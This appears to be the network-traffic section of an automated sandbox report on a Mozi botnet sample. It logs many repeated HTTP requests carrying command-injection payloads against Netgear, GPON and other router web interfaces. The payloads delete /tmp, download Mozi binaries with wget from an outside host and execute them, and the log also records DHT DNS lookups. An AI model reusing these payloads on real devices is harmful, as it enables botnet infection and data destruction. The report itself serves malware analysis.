                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 149.231.60.26:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 17.68.94.139:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 57.217.97.230:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 17.19.142.175:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.24.1.160:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 120.181.234.198:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 120.5.156.96:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 16.126.113.53:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 139.60.238.130:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 5.111.53.202:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 53.85.29.79:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 33.176.226.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 220.55.179.68:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 42.25.58.225:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 94.18.186.242:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficDNS traffic detected: DNS query: dht.transmissionbt.com
                            Source: global trafficDNS traffic detected: DNS query: router.bittorrent.com
                            Source: global trafficDNS traffic detected: DNS query: router.utorrent.com
                            Source: global trafficDNS traffic detected: DNS query: bttracker.debian.org
                            Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 23:36:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 23:37:07 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Content-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: no-cache, privateDate: Thu, 05 Dec 2024 23:39:29 GMTContent-Encoding: gzipData Raw: 33 31 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 c9 6e db 30 10 bd fb 2b 26 0a 0a b4 40 68 39 0b d0 c2 91 7c 49 97 5b 1b d4 b9 f4 48 4b 23 89 0d 45 0a 14 6d c7 2d fa ef 1d 6a b1 69 59 4e 6b 03 a6 48 ce 7b b3 f0 71 e4 e8 e2 e3 b7 87 a7 1f 8f 9f a0 b0 a5 5c 4c 22 37 80 e4 2a 8f 03 54 c1 62 42 2b c8 d3 c5 04 e8 13 95 68 39 24 05 37 35 da 38 58 db 8c 7d 20 93 c3 96 e2 25 c6 c1 46 e0 b6 d2 c6 06 90 68 65 51 91 e9 56 a4 b6 88 53 dc 88 04 59 33 b9 02 a1 84 15 5c b2 3a e1 12 e3 eb 2b a8 0b 23 d4 33 b3 9a 65 c2 c6 4a 8f 50 a7 58 27 46 54 56 68 e5 b1 8f 18 f2 b5 2d b4 19 b1 91 e4 02 0c ca 38 10 14 5d 00 85 c1 2c 0e 0a 6b ab 79 18 5e df bc 9f ce e8 7b 1d 66 9c 42 d5 6a 4a 3f 01 d8 5d 45 69 89 92 e7 18 be b0 06 d7 65 6d 85 95 b8 78 2a f0 8b d1 1b ac 61 69 79 2e 54 1e 85 ed 46 5b 9a 0b c6 e0 61 b9 04 c6 3a d4 21 86 da ee 24 d6 05 22 15 eb 4c 24 3c 2d 85 0a 93 ba 0e 79 55 4d 69 ec b3 6d b0 2d a3 3b 01 80 a9 d4 3c 45 03 bf 1b b7 ed 1a 40 2a ea 4a f2 dd 1c 94 56 78 bf df fa b3 7f 9a 5a 7c b1 6c 5b 08 8b 03 68 a2 a5 36 73 b8 cc b2 6c 08 8c c2 ce 7d 14 b6 fa 98 44 2b 9d ee 20 91 bc ae e3 40 8a bc b0 7d a0 2e ff 47 83 d0 85 b7 2f 43 2a 36 20 52 32 6e c2 a6 b3 ea b0 ed f4 90 59 e4 0c bb 4d 4a 45 21 73 ba e2 42 a1 e9 5c f4 b9 1e 59 d2 21 37 4c 6c 6b a8 72 54 97 95 c8 81 27 56 6c 70 00 73 70 1f 5a 57 42 11 39 a3 b2 11 ac 9f ad e4 1a 99 56 72 37 82 1e 32 24 c2 24 92 e2 94 a2 f1 2c 31 eb ab d1 87 ea 8f be ef 16 19 2c a2 90 b2 3e d4 e0 c8 bc d9 f2 41 39 af 58 c5 6d 52 fc 77 68 67 1d b4 7e 7d f2 41 2e c6 3b 5a 3f 2a f7 7c 0a fb 87 9f bd 08 7b a6 91 b4 07 4b de d4 7f ec c5 44 47 ed 15 21 2a 49 26 c7 55 6c 62 74 b2 ab 0c dd 68 b3 db eb ae 62 96 ad d8 f5 6c 06 05 ba 1c 59 b6 96 12 02 68 84 1e 07 2b 9e 3c e7 46 af 55 3a 5f 1b f9 f6 a4 63 b4 f7 54 94 79 b8 ca a7 3f ab fc dd fd 01 c1 6a f1 0b e7 40 dc 6f ee bd e8 f6 49 7b 02 3f 27 ed 31 5b a3 b7 23 6c 63 96 74 93 99 cc d9 1d 94 2f ac 4c 19 75 c7 be bb f6 d6 c3 d1 3f ca a6 41 24 d4 c8 4f 2e dc 10 e5 e6 51 71 db df d6 d2 b2 1b 68 eb 7a 33 83 43 9f 09 16 77 b3 3b f8 aa 2d 7c 76 05 a5 1e 72 7b 7c 48 a3 bc 55 4f eb 13 51 ef 85 8a 1a 33 ec f4 1a 78 d3 65 f4 33 b5 60 c8 b4 a1 f7 cf 5a a6 d4 f8 2c ac 90 16 c8 d5 34 0a ab d7 5d 79 a2 1a 46 71 a2 56 df e0 ec e6 2b 84 67 b6 46 96 c7 96 5c 5f bd ec 54 bc 7f b9 b8 90 a2 f0 58 f6 91 b3 fc ee 34 0d 4b 91 e2 8a 9b bd f9 81 77 12 85 ae 83 bb 37 7e d8 fe 17 f8 0b 75 51 cf 99 1c 08 00 00 0d 0a 30 0d 0a 0d 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 